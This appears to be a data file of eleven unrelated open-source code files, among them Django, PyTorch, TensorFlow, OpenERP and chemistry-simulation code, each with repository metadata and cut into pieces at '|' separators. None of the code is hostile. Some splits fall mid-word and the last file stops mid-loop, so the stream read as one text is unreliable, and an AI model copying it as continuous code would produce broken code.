evewspace/POS/models.py
|
Python
|
gpl-3.0
| 7,280
| 0.003846
|
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If
|
not, see <http://www.gnu.org/licens
|
es/>.
from django.db import models
from core.models import Type, Location
from API.models import CorpAPIKey
from core.models import Corporation, Alliance
from Map.models import System
import csv
from django.contrib.auth.models import User
import pytz
class POS(models.Model):
"""Represents a POS somewhere in space."""
system = models.ForeignKey(System, related_name="poses")
planet = models.IntegerField()
moon = models.IntegerField()
towertype = models.ForeignKey(Type, related_name="inspace")
corporation = models.ForeignKey(Corporation, related_name="poses")
posname = models.CharField(max_length=100, blank=True, null=True)
fitting = models.TextField(blank=True, null=True)
#Using CCP's status codes here for sanity with API checks
status = models.IntegerField(choices = ((0, 'Unanchored'), (1, 'Anchored'),
(2, 'Onlining'), (3, 'Reinforced'), (4, 'Online')))
#This should be the time the tower exits RF
#TODO: add a validator to make sure this is only set if status = 3 (Reinforced)
rftime = models.DateTimeField(null=True, blank=True)
updated = models.DateTimeField()
# These values will be set by the TSV parser from d-scan data if available
guns = models.IntegerField(null=True, blank=True)
ewar = models.IntegerField(null=True, blank=True)
sma = models.IntegerField(null=True, blank=True)
hardener = models.IntegerField(null=True, blank=True)
# This is a short comment that is displayed as a warning
warpin_notice = models.CharField(blank=True, null=True, max_length=64)
class Meta:
ordering = ['system__name', 'planet', 'moon']
def clean(self):
from django.core.exceptions import ValidationError
if self.rftime and self.status != 3:
raise ValidationError("A POS cannot have an rftime unless it is reinforced")
def __unicode__(self):
return self.posname
#overide save to implement posname defaulting to towertype.name
def save(self, *args, **kwargs):
if not self.posname:
self.posname = self.towertype.name
# Ensure that any newline characters in fitting are changed to <br>
self.fitting = self.fitting.replace("\n", "<br />")
# Mark tower as having been updated
from datetime import datetime
import pytz
self.updated = datetime.now(pytz.utc)
super(POS, self).save(*args, **kwargs)
def size(self):
"""
Returns the size of the tower, Small Medium or Large.
"""
if u'Small' in self.towertype.name:
return u'Small'
if u'Medium' in self.towertype.name:
return u'Medium'
return u'Large'
def fit_from_dscan(self, dscan):
"""
Fills in a POS's fitting from a copy / paste of d-scan results.
"""
import csv
from core.models import Type
itemDict={}
# marketGroupIDs to consider guns, ewar, hardeners, and smas
gunsGroups = [480, 479, 594, 595, 596]
ewarGroups = [481, 1009]
smaGroups = [484,]
hardenerGroups = [485,]
towers = 0
self.sma = 0
self.hardener = 0
self.guns = 0
self.ewar = 0
for row in csv.reader(dscan.splitlines(), delimiter="\t"):
itemType = Type.objects.get(name=row[1])
if itemType.marketgroup:
groupTree = []
parent = itemType.marketgroup
while parent:
groupTree.append(parent.id)
parent = parent.parentgroup
if itemType.marketgroup.id in gunsGroups:
self.guns += 1
if itemType.marketgroup.id in ewarGroups:
self.ewar += 1
if itemType.marketgroup.id in smaGroups:
self.sma += 1
if itemType.marketgroup.id in hardenerGroups:
self.hardener += 1
if itemType.marketgroup.id == 478:
towers += 1
if itemDict.has_key(itemType.name):
itemDict[itemType.name] += 1
elif 1285 in groupTree and 478 not in groupTree:
itemDict.update({itemType.name: 1})
self.fitting = "Imported from D-Scan:\n"
for itemtype in itemDict:
self.fitting += "\n%s : %s" % (itemtype, itemDict[itemtype])
if towers <= 1:
self.save()
else:
raise AttributeError('Too many towers detected in the D-Scan!')
class CorpPOS(POS):
"""A corp-controlled POS with manager and password data."""
manager = models.ForeignKey(User, null=True, blank=True, related_name='poses')
password = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
#Let's store the CCP Item ID for the tower here to make API lookup easier
#If it is null, then we are not tracking this POS via API
apiitemid = models.BigIntegerField(null=True, blank=True)
apikey = models.ForeignKey(CorpAPIKey, null=True, blank=True, related_name='poses')
class Meta:
permissions = (('can_see_pos_pw', 'Can see corp POS passwords.'),
('can_see_all_pos', 'Sees all corp POSes regardless of manager.'),)
class POSApplication(models.Model):
"""Represents an application for a personal POS."""
applicant = models.ForeignKey(User, null=True, blank=True, related_name='posapps')
towertype = models.ForeignKey(Type, null=True, blank=True, related_name='posapps')
residents = models.ManyToManyField(User)
normalfit = models.TextField()
siegefit = models.TextField()
#Once it is approved, we will fill in these two to tie the records together
approved = models.DateTimeField(blank=True, null=True)
posrecord = models.ForeignKey(CorpPOS, blank=True, null=True, related_name='application')
class Meta:
permissions = (('can_close_pos_app', 'Can dispose of corp POS applications.'),)
def __unicode__(self):
return 'Applicant: %s Tower: %s' % (self.applicant.username, self.towertype.name)
class POSVote(models.Model):
"""Represents a vote on a personal POS application."""
application = models.ForeignKey(POSApplication, related_name='votes')
voter = models.ForeignKey(User, related_name='posvotes')
vote = models.IntegerField(choices=((0,'Deny'), (1, 'Approve'), (2, 'Abstain')))
|
mrcslws/nupic.research
|
packages/backprop_structure/src/nupic/research/frameworks/backprop_structure/networks/alexnet_kwinners.py
|
Python
|
agpl-3.0
| 5,250
| 0
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be
|
useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should
|
have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import OrderedDict
from functools import partial
from torch import nn
from nupic.research.frameworks.pytorch.modules import KWinners2dLocal
from nupic.torch.modules import Flatten, KWinners, KWinners2d
__all__ = [
"AlexNetKWinners",
"gsc_alexnet_kwinners",
]
class AlexNetKWinners(nn.Sequential):
def __init__(self,
input_size,
num_classes,
cnn_out_channels=(64, 64),
cnn_activity_percent_on=(0.095, 0.125),
linear_units=1000,
linear_activity_percent_on=(0.1,),
kernel_size=5,
maxpool_stride=2,
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0,
use_kwinners_local=False):
feature_map_sidelength = (
(((input_size[1] - kernel_size + 1) / maxpool_stride)
- kernel_size + 1) / maxpool_stride
)
assert(feature_map_sidelength == int(feature_map_sidelength))
feature_map_sidelength = int(feature_map_sidelength)
kwinner2d_class = KWinners2dLocal if use_kwinners_local else KWinners2d
super().__init__(OrderedDict([
# -------------
# Conv Block
# -------------
("cnn1", nn.Conv2d(input_size[0],
cnn_out_channels[0],
kernel_size)),
("cnn1_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn1_bn", nn.BatchNorm2d(cnn_out_channels[0],
affine=False)),
("cnn1_kwinner", kwinner2d_class(
channels=cnn_out_channels[0],
percent_on=cnn_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
# -------------
# Conv Block
# -------------
("cnn2", nn.Conv2d(cnn_out_channels[0],
cnn_out_channels[1],
kernel_size)),
("cnn2_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn2_bn", nn.BatchNorm2d(cnn_out_channels[1],
affine=False)),
("cnn2_kwinner", kwinner2d_class(
channels=cnn_out_channels[1],
percent_on=cnn_activity_percent_on[1],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("flatten", Flatten()),
# -------------
# Linear Block
# -------------
("fc1", nn.Linear(
(feature_map_sidelength**2) * cnn_out_channels[1],
linear_units)),
("fc1_bn", nn.BatchNorm1d(linear_units, affine=False)),
("fc1_kwinner", KWinners(
n=linear_units,
percent_on=linear_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("fc1_dropout", nn.Dropout(0.5)),
# -------------
# Output Layer
# -------------
("fc2", nn.Linear(linear_units,
num_classes)),
]))
gsc_alexnet_kwinners = partial(AlexNetKWinners,
input_size=(1, 32, 32),
num_classes=12,
cnn_activity_percent_on=(0.095, 0.125),
linear_activity_percent_on=(0.1,),
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0)
|
vlas-sokolov/pyspeckit
|
pyspeckit/spectrum/models/astropy_models.py
|
Python
|
mit
| 1,575
| 0.008889
|
try:
from astropy.models import ParametricModel,Parameter,_convert_input,_convert_output
import numpy as np
class PowerLawModel(ParametricModel):
param_names = ['scale', 'alpha']
def __init__(self, scale, alpha, param_dim=1):
self._scale = Parameter(name='scale', val=scale, mclass=self, param_dim=param_dim)
self._alpha = Parameter(name='alpha', val=alpha, mclass=self, param_dim=param_dim)
super(ParametricModel,self).__init__(self, self.param_names, ndim=1, outdim=1, param_dim=param_dim)
self.linear = False
self.deriv = None
def eval(self, xvals, params):
return params[0]*((xval
|
s)**(-params[1]))
def noderiv(self, params, xvals, yvals):
deriv_dict = {
'scale': ((xvals)**(-params[1])),
'al
|
pha': params[0]*((xvals)**(-params[1]))*np.log(xvals)}
derivval = [deriv_dict[par] for par in self.param_names]
return np.array(derivval).T
def __call__(self, x):
"""
Transforms data using this model.
Parameters
--------------
x : array, of minimum dimensions 1
Notes
-----
See the module docstring for rules for model evaluation.
"""
x, fmt = _convert_input(x, self.param_dim)
result = self.eval(x, self.param_sets)
return _convert_output(result, fmt)
except ImportError:
pass
|
csparpa/pyowm
|
pyowm/utils/measurables.py
|
Python
|
mit
| 7,259
| 0.000276
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-"""
# Temperature conversion constants
KELVIN_OFFSET = 273.15
FAHRENHEIT_OFFSET = 32.0
FAHRENHEIT_DEGREE_SCALE = 1.8
# Wind speed conversion constants
MILES_PER_HOUR_FOR_ONE_METER_PER_SEC = 2.23694
KM_PER_HOUR_FOR_ONE_METER_PER_SEC = 3.6
KNOTS_FOR_ONE_METER_PER_SEC = 1.94384
# Barometric conversion constants
HPA_FOR_ONE_INHG = 33.8639
# Visibility distance conversion constants
MILE_FOR_ONE_METER = 0.000621371
KMS_FOR_ONE_METER = .001
# Decimal precision
ROUNDED_TO = 2
def kelvin_dict_to(d, target_temperature_unit):
"""
Converts all the values in a dict from Kelvin temperatures to the
specified temperature format.
:param d: the dictionary containing Kelvin temperature values
:type d: dict
:param target_temperature_unit: the target temperature unit, may be:
'celsius' or 'fahrenheit'
:type target_temperature_unit: str
:returns: a dict with the same keys as the input dict and converted
temperature values as values
:raises: *ValueError* when unknown target temperature units are provided
"""
if target_temperature_unit == 'kelvin':
return d
elif target_temperature_unit == 'celsius':
return {key: kelvin_to_celsius(d[key]) for key in d}
elif target_temperature_unit == 'fahrenheit':
return {key: kelvin_to_fahrenheit(d[key]) for key in d}
else:
raise ValueError("Invalid value for target temperature conversion \
unit")
def kelvin_to_celsius(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Celsius degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Celsius temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
celsiustemp = kelvintemp - KELVIN_OFFSET
return float("{0:.2f}".format(celsiustemp))
def kelvin_to_fahrenheit(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Fahrenheit degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Fahrenheit temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
fahrenheittemp = (kelvintemp - KELVIN_OFFSET) * \
FAHRENHEIT_DEGREE_SCALE + FAHRENHEIT_OFFSET
return float("{0:.2f}".format(fahrenheittemp))
def metric_wind_dict_to_imperial(d):
"""
Converts all the wind values in a dict from meters/sec (metric measurement
system) to miles/hour (imperial measurement system)
.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to miles/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * MILES_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_km_h(d):
"""
Converts all the wind values in a dict from meters/sec
to km/hour.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wi
|
nd degree
result[key] = value * KM_P
|
ER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_knots(d):
"""
Converts all the wind values in a dict from meters/sec
to knots
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KNOTS_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_beaufort(d):
"""
Converts all the wind values in a dict from meters/sec
to the corresponding Beaufort scale level (which is not an exact number but rather
represents a range of wind speeds - see: https://en.wikipedia.org/wiki/Beaufort_scale).
Conversion table: https://www.windfinder.com/wind/windspeed.htm
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to Beaufort level
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
if value <= 0.2:
bf = 0
elif 0.2 < value <= 1.5:
bf = 1
elif 1.5 < value <= 3.3:
bf = 2
elif 3.3 < value <= 5.4:
bf = 3
elif 5.4 < value <= 7.9:
bf = 4
elif 7.9 < value <= 10.7:
bf = 5
elif 10.7 < value <= 13.8:
bf = 6
elif 13.8 < value <= 17.1:
bf = 7
elif 17.1 < value <= 20.7:
bf = 8
elif 20.7 < value <= 24.4:
bf = 9
elif 24.4 < value <= 28.4:
bf = 10
elif 28.4 < value <= 32.6:
bf = 11
else:
bf = 12
result[key] = bf
else:
result[key] = value
return result
def metric_pressure_dict_to_inhg(d):
"""
Converts all barometric pressure values in a dict to "inches of mercury."
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to "Hg or inHg (inches of mercury)
Note what OWM says about pressure: "Atmospheric pressure [is given in hPa]
(on the sea level, if there is no sea_level or grnd_level data)"
"""
result = dict()
for key, value in d.items():
if value is None:
continue
result[key] = round((value / HPA_FOR_ONE_INHG), ROUNDED_TO)
return result
def visibility_distance_to(v, target_visibility_unit='kilometers'):
"""
Converts visibility distance (in meters) to kilometers or miles
Defaults to kilometer conversion
:param distance: the value of visibility_distance
:type distance: int
:param target_visibility_unit: the unit of conversion
:type target_visibility_unit: str
:returns: a converted value for visibility_distance (float)
"""
if v is None:
return v
if target_visibility_unit == 'kilometers':
const = KMS_FOR_ONE_METER
elif target_visibility_unit == 'miles':
const = MILE_FOR_ONE_METER
else:
raise ValueError('Invalid value for target visibility distance unit')
return round(v * const, ROUNDED_TO)
|
aaronsw/watchdog
|
import/parse/punch.py
|
Python
|
agpl-3.0
| 1,090
| 0.008257
|
from decimal import Decimal
import re
import web
r_row = re.compile(r'<tr>(.*?)</tr>', re.S)
r_td = re.compile(r'<td v[^>]+>([^<]*)</td>')
r_member = re.compile(r'member=([^"]+)">([^<]+)<')
def fixdec(d):
d = d.strip()
return Decimal(d) and Decimal(d)/100
def parse_doc(d):
for row in r_row.findall(d):
out = r_td.findall(row)
if out:
dist, membername = r_member.findall(row)[0]
dist = dist.replace('At Large', '00')
dist = dist[:2] + '-' + dist[2:].zfill(2)
s = web.storage()
s.district = dist
s.progressive2008 = fixdec(out[0])
s.chips2008 = fixdec(out
|
[1])
s.progressiveall = fixdec(out[3])
s.name = membername.decode('iso-8859-1')
yield s
def parse
|
_all():
d = file('../data/crawl/punch/house.html').read()
for x in parse_doc(d): yield x
d = file('../data/crawl/punch/senate.html').read()
for x in parse_doc(d): yield x
if __name__ == "__main__":
import tools
tools.export(parse_all())
|
galaxy-ctf/milky-way
|
milkyway/management/commands/load_chals.py
|
Python
|
agpl-3.0
| 1,410
| 0
|
from django.core.management.base import BaseCommand
from milkyway.models import Challenge, Hint, Category, Flag
import yaml
class Command(BaseCommand):
help = 'Load data from yaml file'
def add_arguments(self, parser):
parser.add_argument('dataset', type=str)
def handle(self, *args, **options):
with open(options['dataset'], 'r') as handle:
data = yaml.load(handle)
Category.objects.all().delete()
for cat in data['chals']:
ca
|
tegory = Category.objects.create(
name=cat['name'],
description=cat['desc']
)
for chal in cat['chals']:
chal_data = {
'id': chal['id'],
'name': chal['n
|
ame'],
'description': chal['desc'],
'value': chal['value'],
'category': category,
'lesson': chal.get('lesson', ''),
}
c = Challenge.objects.create(**chal_data)
for hint in chal['hints']:
Hint.objects.create(text=hint, chal=c, show=False)
c.save()
for flag in chal['flags']:
Flag.objects.create(
chal=c,
flag=flag['flag'],
flag_is_regex=flag['regex'],
)
|
HaebinShin/tensorflow
|
tensorflow/contrib/metrics/python/metrics/classification.py
|
Python
|
apache-2.0
| 2,307
| 0.002167
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classification metrics library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
# TODO(nsilberman): move into metrics/python/ops/
def accuracy(predictions, labels, weights=None):
"""Computes the percentage of times that predictions matches labels.
Args:
predictions: the predicted values, a `Tensor` whose dtype and shape
matches 'labels'.
labels: the ground truth values, a `Tensor` of any shape and
integer or string dtype.
weights: None or `Tensor` of float values to reweight the accuracy.
Returns:
Accuracy `Tensor`.
Raises:
ValueError: if dtypes don't match or
if dtype is not integer or string.
"""
if not (labels.dtype.is_integer or labels.dtype == dtypes.string):
rai
|
se ValueError('Labels should have integer or string dtype. '
|
'Given: %s' % str(labels.dtype))
if not labels.dtype.is_compatible_with(predictions.dtype):
raise ValueError('Dtypes of predictions and labels should match. '
'Given: predictions (%s) and labels (%s)' %
(str(predictions.dtype), str(labels.dtype)))
with ops.op_scope([predictions, labels], 'accuracy'):
is_correct = math_ops.cast(
math_ops.equal(predictions, labels), dtypes.float32)
if weights is not None:
is_correct = math_ops.mul(is_correct, weights)
return math_ops.reduce_mean(is_correct)
|
trabacus-softapps/openerp-8.0-cc
|
openerp/service/server.py
|
Python
|
agpl-3.0
| 32,015
| 0.003155
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
import resource
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
import openerp.tools.config as config
from openerp.release import nt_service_name
from openerp.tools.misc import stripped_sys_argv, dumpstacks
import wsgi_server
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
""" psutil < 2.0 does not have memory_info, >= 3.0 does not have
get_memory_info """
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
return (pmem.rss, pmem.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class BaseWSGIServerNoBind(werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
# we dont bind beause we use the listen socket of PreforkServer#socket
# instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd)) ? it seem python duplicate the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, t
|
imeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.tools.config.options["addons_path"].split(','):
_logger.info('Watching addons fold
|
er %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
addons_path = openerp.tools.config.options["addons_path"].split(',')
for i in xml_files:
for path in addons_path:
if i.startswith(path):
# find out wich addons path the file belongs to
# and extract it's module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module]=1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s',i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT,signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
|
qedsoftware/commcare-hq
|
corehq/apps/dump_reload/sql/filters.py
|
Python
|
bsd-3-clause
| 1,812
| 0.002208
|
from abc import ABCMeta, abstractmethod
import six
from django.db.models import Q
from dimagi.utils.chunked import chunked
class DomainFilter(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_filters(self, domain_name):
"""Return a list of filters. Each filter will be applied to a queryset independently
of the others."""
raise NotImplementedError()
class SimpleFilter(DomainFilter):
def __init__(self, filter_kwarg):
self.filter_kwarg = filter_kwarg
def get_filters(self, domain_name):
return [Q(**{self.filter_kwarg: domain_name})]
class UsernameFilter(DomainFilter):
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 500 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_usernames_by_domain
usernames = get_all_usernames_by_domain(domain
|
_name)
for chunk in chunked(usernames, 500):
filter = Q()
|
for username in chunk:
filter |= Q(username__iexact=username)
yield filter
class UserIDFilter(DomainFilter):
def __init__(self, user_id_field, include_web_users=True):
self.user_id_field = user_id_field
self.include_web_users = include_web_users
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 1000 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_user_ids_by_domain
user_ids = get_all_user_ids_by_domain(domain_name, include_web_users=self.include_web_users)
for chunk in chunked(user_ids, 1000):
query_kwarg = '{}__in'.format(self.user_id_field)
yield Q(**{query_kwarg: chunk})
|
ox-it/humfrey
|
humfrey/update/transform/upload.py
|
Python
|
bsd-3-clause
| 2,982
| 0.001341
|
from __future__ import with_statement
import datetime
import logging
import pytz
import rdflib
from django.conf import settings
from humfrey.update.transform.base import Transform
from humfrey.update.uploader import Uploader
from humfrey.sparql.endpoint import Endpoint
from humfrey.utils.namespaces import NS
logger = logging.getLogger(__name__)
class Upload(Transform):
formats = {
'rdf': 'xml',
'n3': 'n3',
'ttl': 'n3',
'nt': 'nt',
}
created_query = """
SELECT ?date WHERE {
GRAPH %(graph)s {
%(graph)s dcterms:created ?date
}
}
"""
site_timezone = pytz.timezone(settings.TIME_ZONE)
def __init__(self, graph_name, method='PUT'):
self.graph_name = rdflib.URIRef(graph_name)
self.method = method
def execute(self, transform_manager, input):
transform_manager.start(self, [input])
logger.debug("Starting upload of
|
%r", input)
extension = input.r
|
split('.', 1)[-1]
try:
serializer = self.formats[extension]
except KeyError:
logger.exception("Unrecognized RDF extension: %r", extension)
raise
graph = rdflib.ConjunctiveGraph()
graph.parse(open(input, 'r'),
format=serializer,
publicID=self.graph_name)
logger.debug("Parsed graph")
datetime_now = self.site_timezone.localize(datetime.datetime.now().replace(microsecond=0))
modified = graph.value(self.graph_name, NS['dcterms'].modified,
default=rdflib.Literal(datetime_now))
created = graph.value(self.graph_name, NS['dcterms'].created)
if not created:
logger.debug("Getting created date from %r", transform_manager.store.query_endpoint)
endpoint = Endpoint(transform_manager.store.query_endpoint)
results = list(endpoint.query(self.created_query % {'graph': self.graph_name.n3()}))
if results:
created = results[0].date
else:
created = modified
graph += (
(self.graph_name, NS.rdf.type, NS.sd.Graph),
(self.graph_name, NS.dcterms.modified, modified),
(self.graph_name, NS.dcterms.created, created),
)
logger.debug("About to serialize")
output = transform_manager('rdf')
with open(output, 'w') as f:
graph.serialize(f)
logger.debug("Serialization done; about to upload")
uploader = Uploader()
uploader.upload(stores=(transform_manager.store,),
graph_name=self.graph_name,
filename=output,
method=self.method,
mimetype='application/rdf+xml')
logger.debug("Upload complete")
transform_manager.end([self.graph_name])
transform_manager.touched_graph(self.graph_name)
|
eljost/pysisyphus
|
tests_staging/test_mullerbrownpot.py
|
Python
|
gpl-3.0
| 6,681
| 0.002994
|
#!/usr/bin/env python3
import copy
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.calculators.MullerBrownPot import MullerBrownPot
#from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.BFGS import BFGS
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.Geometry import Geometry
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
KWARGS = {
"images": 4,
"max_cycles": 100,
"max_step": 0.02,
"convergence": {
"max_force_thresh": 0.1,
"rms_force_thresh": 0.02,
"max_step_thresh": 0.005,
"rms_step_thresh": 0.001,
},
"dump": False,
}
def get_geoms(keys=("B","C","TSA","A")):
coords_dict = {
"A": (-0.558, 1.442, 0), # Minimum A
"B": (0.6215, 0.02838, 0), # Minimum B
"C": (-0.05, 0.467, 0), # Minimum C
"AC": (-0.57, 0.8, 0), # Between A and C
"TSA": (-0.822, 0.624, 0) # Saddle point A
}
coords = [np.array(coords_dict[k]) for k in keys]
atoms = ("H")
geoms = [Geometry(atoms, c) for c in coords]
return geoms
def run_cos_opt(cos, Opt, images, **kwargs):
cos.interpolate(images)
opt = Opt(cos, **kwargs)
for img in cos.images:
